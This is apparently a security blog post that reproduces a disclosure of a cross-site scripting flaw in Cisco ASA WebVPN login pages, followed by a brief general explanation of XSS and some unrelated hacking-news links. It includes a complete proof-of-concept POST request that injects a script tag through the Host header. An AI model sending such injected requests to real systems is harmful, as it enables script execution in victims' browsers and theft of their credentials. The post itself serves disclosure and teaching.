Cisco ASA WebVPN Cross Site Scripting Vulnerability
Cisco ASA is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Cisco ASA software versions 8.0.4(2B) and prior running on ASA 5500 Series Adaptive Security Appliances are vulnerable.
An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious HTTP request.
POST /+webvpn+/index.html HTTP/1.1 Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.example.org Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://www.example.com/+webvpn+/index.html Accept-Language: en-us Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032) Connection: Keep-Alive Cache-Control: no-cache Cookie: webvpnlogin=1 Content-Length: 66 username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
What is Cross-site scripting?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
- Li-Fi is 100 times Faster than Wi-Fi Technology: Real-World Tests Prove: Yes, it's time to shift from... https://t.co/Yd3S8FIIu8 #hackers
- Raspberry Pi Zero — The $5 Tiny Computer is Here: Get ready for a ThanksGiving celebration from the R... https://t.co/kpaNEjHMPn #hackers
- Hackers are using Nuclear Exploit Kit to Spread Cryptowall 4.0 Ransomware: Beware Internet Users! ... https://t.co/AJFGRcPbkv #hackers
Enter your email address to receive notifications of new posts.